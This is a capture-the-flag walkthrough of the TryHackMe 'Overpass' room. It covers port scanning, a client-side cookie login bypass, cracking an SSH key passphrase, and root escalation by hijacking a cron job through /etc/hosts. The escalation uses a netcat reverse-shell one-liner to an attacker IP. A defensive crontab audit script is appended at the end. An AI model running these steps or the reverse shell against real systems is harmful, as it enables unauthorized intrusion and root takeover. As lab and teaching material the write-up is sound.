Overpass

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):

nmap -Pn 10.10.48.148

Detailed nmap scan:

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80

  • (-oN nmap): Saving the output to a file called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.48.148

Enumeration

Let's visit the website.

There is nothing of interest as of now, so let's run gobuster to find hidden directories.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.48.148/

We find an admin page, so let's visit it.

It's a login page. After looking through the different files in the source code of the page, I found an interesting file called login.js, and the interesting part is the function called login:

async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }
}

Looking at the if statement: if we log in with incorrect credentials, the response we get is "Incorrect credentials". On the other hand, if we supply the right credentials, it sets the SessionToken cookie to the value of statusOrCookie and points us to the /admin page. The client code treats any response other than that one string as a session token.

So let's go to the Console (Ctrl + Shift + I) of the web page and type this in the console.

Once you press Enter and reload the page, you are logged in.

You are given an RSA private key, so we can copy it, crack the password using John the Ripper, and then log in with ssh. I copied the RSA private key and stored it in a file called id_rsa.

Now we need a password to log in with ssh, so let's first convert the key into a hash that John can work with, using ssh2john.

/usr/share/john/ssh2john.py id_rsa > id_rsa_hash

Now let's crack the hash with John the Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash

We found the password, which is james13.

Now, to log in with this information, we first need to set the right permissions on the id_rsa file.

chmod 600 id_rsa

And now we can use this command to log in through ssh. I think the username is going to be james, as the password has the word james in it.

ssh -i id_rsa james@10.10.48.148

We can now read user.txt.

Privilege Escalation

We cannot run the command sudo -l to see what we can run as root as we don't have the password for james.

In the directory we are in, we see a file called todo.txt, so let's read the file.

From this we can say that

  • There is a password somewhere in the password manager they made

  • The encryption for the password is weak

  • There is an automated build script running.

There is also another interesting file in this directory, which is called .overpass

Let's read the file.

It looks like some type of code that has been modified, so let's go to CyberChef and see what it says. I went through different recipes and found the correct one, which is ROT47.

I looked for a way to use this information to escalate privileges to root, but it did not help in any way, so we need to find another way.

Looking back at the todo.txt file, we saw that there was an automated build script running, so let's check that.

cat /etc/crontab

Looking at the last line, we can see that the cron job fetches the buildscript file from the website and pipes it to bash. To exploit this, we need to redirect the domain to our IP address. We can do that by adding our TryHackMe IP to /etc/hosts on this machine: we need to replace the IP of overpass.thm with our IP.

Now we need to create a directory structure similar to the one on the victim machine so that the exploit can work properly, so let's create the directory downloads/src:

mkdir -p downloads/src

Now we should create a file called buildscript.sh and add a reverse shell to it, so that we get a reverse shell when it runs every few minutes as a cron job.

We can find the reverse shell here.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f' > buildscript.sh

And now we have to start an HTTP server using python (make sure you are two directories up, which means that you can cd into downloads/src from there) so that the victim machine can connect to our machine, and also start a netcat listener to catch the reverse shell.

python3 -m http.server 80
nc -lvnp 1234

After a while, the file should be downloaded.

And you should also get a reverse shell, as root.

Now you can read the root.txt file and answer the last question of this room.
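
The escalation above works because a root cron job executes whatever a host name resolves to, on a machine where a non-root user could edit /etc/hosts. As an added example (not part of the original write-up), the script below audits a crontab for such download-and-pipe-to-shell jobs and reports when the hosts file is group- or world-writable; the function names and the sample crontab lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag system-crontab jobs that download a script and pipe it
# into a shell, and note when the hosts file they rely on is loosely writable.

# audit_crontab FILE -> one "user host" line per download-and-execute job.
# Assumes the /etc/crontab layout (m h dom mon dow user command) and that the
# first non-option word after curl/wget is the URL.
audit_crontab() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" |
    grep -E '(curl|wget)[^|]*\|[[:space:]]*([^[:space:]]*/)?(ba)?sh([[:space:]]|$)' |
    while read -r _m _h _dom _mon _dow user cmd; do
        set -f; url=
        for w in ${cmd%%\|*}; do
            case $w in curl|wget|-*) continue ;; esac
            url=$w; break
        done
        host=${url#*://}; host=${host%%[:/]*}
        printf '%s %s\n' "$user" "${host:-unknown}"
    done
}

# loosely_writable FILE -> true if FILE is group- or world-writable.
loosely_writable() {
    [ -n "$(find "$1" -prune \( -perm -0020 -o -perm -0002 \) 2>/dev/null)" ]
}

# report CRONTAB HOSTS_FILE -> "user host risks" per finding.
report() {
    audit_crontab "$1" | while read -r user host; do
        risk=pipe-to-shell
        # A job that resolves a name trusts whoever can edit the name mapping.
        case $host in *[!0-9.]*) named=1 ;; *) named=0 ;; esac
        if [ "$named" = 1 ] && loosely_writable "$2"; then
            risk="$risk,hosts-file-writable"
        fi
        printf '%s %s %s\n' "$user" "$host" "$risk"
    done
}

# Constructed sample input, modelled on the job the write-up describes.
demo() {
    d=$(mktemp -d)
    printf '%s\n' '# m h dom mon dow user command' \
        '* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash' \
        '17 * * * * root cd / && run-parts --report /etc/cron.hourly' > "$d/crontab"
    printf '127.0.0.1 localhost\n' > "$d/hosts"; chmod 666 "$d/hosts"
    report "$d/crontab" "$d/hosts"   # root overpass.thm pipe-to-shell,hosts-file-writable
    rm -rf "$d"
}
demo
```

On a real host, run `report /etc/crontab /etc/hosts`; any finding is a job to replace with a locally stored, root-owned script or a download that is verified before it is executed.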
